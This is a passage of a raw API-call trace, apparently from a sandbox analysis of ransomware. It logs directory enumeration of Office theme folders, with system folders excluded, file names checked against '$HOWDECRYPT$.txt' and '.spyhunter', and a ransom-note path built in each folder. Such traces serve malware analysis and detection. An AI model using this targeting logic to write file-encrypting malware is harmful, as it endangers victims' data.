(in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 79 [0090.297] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.297] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.297] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.297] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 79 [0090.297] GetProcessHeap () returned 0x2c0000 [0090.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x375180 [0090.297] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1008) returned 0x3824f8 [0090.297] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.297] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.297] lstrlenW (lpString="Windows") returned 7 [0090.297] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.297] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.297] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.297] lstrlenW (lpString="System Volume Information") returned 25 [0090.297] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 80 [0090.297] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.297] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.297] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.297] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 80 [0090.297] GetProcessHeap () returned 0x2c0000 [0090.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x344bf8 [0090.298] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1010) returned 0x3824f8 [0090.298] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.298] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.298] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\$HOWDECRYPT$.txt") returned 84 [0090.298] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\$HOWDECRYPT$.txt") returned 84 [0090.298] GetProcessHeap () returned 0x2c0000 [0090.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x354338 [0090.298] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1018) returned 0x3824f8 [0090.298] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.298] lstrcmpiW (lpString1="COMPASS", lpString2="Windows") returned -1 [0090.298] lstrlenW (lpString="Windows") returned 7 [0090.298] lstrcmpiW (lpString1="COMPASS", lpString2="$Recycle.bin") returned 1 [0090.298] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.298] lstrcmpiW (lpString1="COMPASS", lpString2="System Volume Information") returned -1 [0090.298] lstrlenW (lpString="System Volume Information") returned 25 [0090.298] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS") returned 67 [0090.298] lstrcmpW (lpString1="COMPASS", lpString2=".") returned 1 [0090.298] lstrcmpW (lpString1="COMPASS", lpString2="..") returned 1 [0090.298] GetProcessHeap () returned 0x2c0000 [0090.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.299] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\*") returned 69 [0090.299] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.300] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.300] lstrlenW (lpString="Windows") returned 7 [0090.301] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.301] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.301] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.301] lstrlenW (lpString="System Volume Information") returned 25 [0090.301] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\.") returned 69 [0090.301] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.301] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.301] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.301] lstrlenW (lpString="Windows") returned 7 [0090.301] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.301] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.301] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.301] lstrlenW (lpString="System Volume Information") returned 25 [0090.301] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\..") returned 70 [0090.301] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.301] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.301] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.301] lstrcmpiW (lpString1="COMPASS.ELM", lpString2="Windows") returned -1 [0090.301] lstrlenW (lpString="Windows") returned 7 [0090.301] lstrcmpiW (lpString1="COMPASS.ELM", lpString2="$Recycle.bin") returned 1 [0090.301] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.301] lstrcmpiW (lpString1="COMPASS.ELM", lpString2="System Volume Information") returned -1 [0090.301] lstrlenW (lpString="System Volume Information") returned 25 [0090.301] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM") returned 79 [0090.301] StrStrIW (lpFirst="COMPASS.ELM", lpSrch=".spyhunter") returned 0x0 [0090.302] lstrcmpW (lpString1="COMPASS.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.302] lstrcmpW (lpString1="COMPASS.ELM", lpString2="_uninstalling_.png") returned 1 [0090.302] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM") returned 79 [0090.302] GetProcessHeap () returned 0x2c0000 [0090.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x375268 [0090.302] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1020) returned 0x3824f8 [0090.303] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.303] lstrcmpiW (lpString1="COMPASS.INF", lpString2="Windows") returned -1 [0090.303] lstrlenW (lpString="Windows") returned 7 [0090.303] lstrcmpiW (lpString1="COMPASS.INF", lpString2="$Recycle.bin") returned 1 [0090.303] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.303] lstrcmpiW (lpString1="COMPASS.INF", lpString2="System Volume Information") returned -1 [0090.303] lstrlenW (lpString="System Volume Information") returned 25 [0090.303] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 79 [0090.303] StrStrIW (lpFirst="COMPASS.INF", lpSrch=".spyhunter") returned 0x0 [0090.303] lstrcmpW (lpString1="COMPASS.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.303] lstrcmpW (lpString1="COMPASS.INF", lpString2="_uninstalling_.png") returned 1 [0090.304] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 79 [0090.304] GetProcessHeap () returned 0x2c0000 [0090.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x375350 [0090.304] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1028) returned 0x3824f8 [0090.304] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.304] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.304] lstrlenW (lpString="Windows") returned 7 [0090.304] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.304] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.304] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.304] lstrlenW (lpString="System Volume Information") returned 25 [0090.304] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 79 [0090.304] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.308] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.323] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.323] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 79 [0090.323] GetProcessHeap () returned 0x2c0000 [0090.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x375350 [0090.323] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1020) returned 0x3824f8 [0090.323] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.323] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.323] lstrlenW (lpString="Windows") returned 7 [0090.324] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.324] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.324] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.324] lstrlenW (lpString="System Volume Information") returned 25 [0090.324] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 80 [0090.324] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.324] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.324] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.324] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 80 [0090.324] GetProcessHeap () returned 0x2c0000 [0090.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x344748 [0090.324] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1028) returned 0x3824f8 [0090.324] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.324] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.371] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\$HOWDECRYPT$.txt") returned 84 [0090.371] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\$HOWDECRYPT$.txt") returned 84 [0090.371] GetProcessHeap () returned 0x2c0000 [0090.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x354338 [0090.371] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1010) returned 0x3824f8 [0090.371] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.371] lstrcmpiW (lpString1="CONCRETE", lpString2="Windows") returned -1 [0090.371] lstrlenW (lpString="Windows") returned 7 [0090.371] lstrcmpiW (lpString1="CONCRETE", lpString2="$Recycle.bin") returned 1 [0090.371] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.371] lstrcmpiW (lpString1="CONCRETE", lpString2="System Volume Information") returned -1 [0090.371] lstrlenW (lpString="System Volume Information") returned 25 [0090.371] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE") returned 68 [0090.371] lstrcmpW (lpString1="CONCRETE", lpString2=".") returned 1 [0090.371] lstrcmpW (lpString1="CONCRETE", lpString2="..") returned 1 [0090.371] GetProcessHeap () returned 0x2c0000 [0090.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.372] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\*") returned 70 [0090.372] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.372] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.372] lstrlenW (lpString="Windows") returned 7 [0090.372] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.372] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.372] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.372] lstrlenW (lpString="System Volume Information") returned 25 [0090.372] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\.") returned 70 [0090.372] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.372] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.372] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.372] lstrlenW (lpString="Windows") returned 7 [0090.372] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.372] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.372] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.372] lstrlenW (lpString="System Volume Information") returned 25 [0090.373] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\..") returned 71 [0090.373] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.373] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.373] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.373] lstrcmpiW (lpString1="CONCRETE.ELM", lpString2="Windows") returned -1 [0090.373] lstrlenW (lpString="Windows") returned 7 [0090.373] lstrcmpiW (lpString1="CONCRETE.ELM", lpString2="$Recycle.bin") returned 1 [0090.373] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.373] lstrcmpiW (lpString1="CONCRETE.ELM", lpString2="System Volume Information") returned -1 [0090.373] lstrlenW (lpString="System Volume Information") returned 25 [0090.373] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 81 [0090.373] StrStrIW (lpFirst="CONCRETE.ELM", lpSrch=".spyhunter") returned 0x0 [0090.373] lstrcmpW (lpString1="CONCRETE.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.373] lstrcmpW (lpString1="CONCRETE.ELM", lpString2="_uninstalling_.png") returned 1 [0090.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 81 [0090.373] GetProcessHeap () returned 0x2c0000 [0090.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x344ce8 [0090.373] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1018) returned 0x3824f8 [0090.373] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.373] lstrcmpiW (lpString1="CONCRETE.INF", lpString2="Windows") returned -1 [0090.373] lstrlenW (lpString="Windows") returned 7 [0090.373] lstrcmpiW (lpString1="CONCRETE.INF", lpString2="$Recycle.bin") returned 1 [0090.374] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.374] lstrcmpiW (lpString1="CONCRETE.INF", lpString2="System Volume Information") returned -1 [0090.374] lstrlenW (lpString="System Volume Information") returned 25 [0090.374] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF") returned 81 [0090.374] StrStrIW (lpFirst="CONCRETE.INF", lpSrch=".spyhunter") returned 0x0 [0090.374] lstrcmpW (lpString1="CONCRETE.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.374] lstrcmpW (lpString1="CONCRETE.INF", lpString2="_uninstalling_.png") returned 1 [0090.374] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF") returned 81 [0090.374] GetProcessHeap () returned 0x2c0000 [0090.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x344dd8 [0090.374] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1020) returned 0x3824f8 [0090.374] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.374] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.374] lstrlenW (lpString="Windows") returned 7 [0090.374] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.374] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.374] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.374] lstrlenW (lpString="System Volume Information") returned 25 [0090.374] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 80 [0090.374] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.374] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.374] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.374] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 80 [0090.375] GetProcessHeap () returned 0x2c0000 [0090.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x344ec8 [0090.375] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1028) returned 0x3824f8 [0090.375] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.375] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.375] lstrlenW (lpString="Windows") returned 7 [0090.375] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.375] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.375] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.375] lstrlenW (lpString="System Volume Information") returned 25 [0090.375] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 81 [0090.375] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.375] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.375] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.375] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 81 [0090.375] GetProcessHeap () returned 0x2c0000 [0090.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x344fb8 [0090.375] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1030) returned 0x3824f8 [0090.375] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.375] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.375] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\$HOWDECRYPT$.txt") returned 85 [0090.375] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\$HOWDECRYPT$.txt") returned 85 [0090.376] GetProcessHeap () returned 0x2c0000 [0090.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x354a00 [0090.376] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1038) returned 0x3824f8 [0090.376] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.376] lstrcmpiW (lpString1="DEEPBLUE", lpString2="Windows") returned -1 [0090.376] lstrlenW (lpString="Windows") returned 7 [0090.376] lstrcmpiW (lpString1="DEEPBLUE", lpString2="$Recycle.bin") returned 1 [0090.376] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.376] lstrcmpiW (lpString1="DEEPBLUE", lpString2="System Volume Information") returned -1 [0090.376] lstrlenW (lpString="System Volume Information") returned 25 [0090.376] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE") returned 68 [0090.376] lstrcmpW (lpString1="DEEPBLUE", lpString2=".") returned 1 [0090.376] lstrcmpW (lpString1="DEEPBLUE", lpString2="..") returned 1 [0090.376] GetProcessHeap () returned 0x2c0000 [0090.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.376] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\*") returned 70 [0090.376] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.383] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.383] lstrlenW (lpString="Windows") returned 7 [0090.383] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.383] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.383] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.383] lstrlenW (lpString="System Volume Information") returned 25 [0090.383] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\.") returned 70 [0090.383] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.383] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.383] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.383] lstrlenW (lpString="Windows") returned 7 [0090.383] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.384] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.384] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.384] lstrlenW (lpString="System Volume Information") returned 25 [0090.384] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\..") returned 71 [0090.384] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.384] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.384] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.384] lstrcmpiW (lpString1="DEEPBLUE.ELM", lpString2="Windows") returned -1 [0090.385] lstrlenW (lpString="Windows") returned 7 [0090.385] lstrcmpiW (lpString1="DEEPBLUE.ELM", lpString2="$Recycle.bin") returned 1 [0090.385] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.385] lstrcmpiW (lpString1="DEEPBLUE.ELM", lpString2="System Volume Information") returned -1 [0090.385] lstrlenW (lpString="System Volume Information") returned 25 [0090.385] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 81 [0090.385] StrStrIW (lpFirst="DEEPBLUE.ELM", lpSrch=".spyhunter") returned 0x0 [0090.385] lstrcmpW (lpString1="DEEPBLUE.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.385] lstrcmpW (lpString1="DEEPBLUE.ELM", lpString2="_uninstalling_.png") returned 1 [0090.385] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 81 [0090.385] GetProcessHeap () returned 0x2c0000 [0090.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x3450a8 [0090.385] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1040) returned 0x3824f8 [0090.386] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.386] lstrcmpiW (lpString1="DEEPBLUE.INF", lpString2="Windows") returned -1 [0090.386] lstrlenW (lpString="Windows") returned 7 [0090.386] lstrcmpiW (lpString1="DEEPBLUE.INF", lpString2="$Recycle.bin") returned 1 [0090.386] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.386] lstrcmpiW (lpString1="DEEPBLUE.INF", lpString2="System Volume Information") returned -1 [0090.386] lstrlenW (lpString="System Volume Information") returned 25 [0090.386] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: 